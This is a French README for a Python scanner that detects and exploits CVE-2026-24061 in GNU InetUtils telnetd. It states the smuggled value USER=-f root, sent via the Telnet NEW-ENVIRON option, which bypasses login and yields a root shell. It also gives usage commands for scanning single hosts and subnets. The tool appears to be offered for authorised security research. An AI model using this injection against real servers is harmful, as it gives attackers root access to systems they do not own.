
CVE-2026-24061 — Scanner de contournement d'authentification GNU InetUtils Telnetd
Un scanner de sécurité basé sur Python qui détecte et exploite CVE-2026-24061, une vulnérabilité critique (CVSS 9.8) de contournement d'authentification dans les versions 1.9.3 à 2.7 de telnetd de GNU InetUtils.
Le scanner injecte une valeur malveillante USER=-f root via l'option Telnet NEW-ENVIRON (RFC 1572), trompant le serveur afin qu'il ignore l'authentification et accorde un shell root.
id# Scan single target
sudo python3 telnetd_scanner.py -t 192.168.56.101 -p 23 -v
# Scan entire subnet
sudo python3 telnetd_scanner.py -t 192.168.56.0/24 --threads 30
# Save report
sudo python3 telnetd_scanner.py -t 192.168.56.101 -o report.txt
# JSON output
sudo python3 telnetd_scanner.py -t 192.168.56.101 --format json -o report.json
| Logiciel | Vulnérable | Corrigée |
|---|---|---|
| GNU InetUtils telnetd | <= 2.7 | >= 2.8 |
Cet outil est destiné uniquement à des fins de recherche en sécurité autorisée et d'enseignement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
Ahmad Sadeeq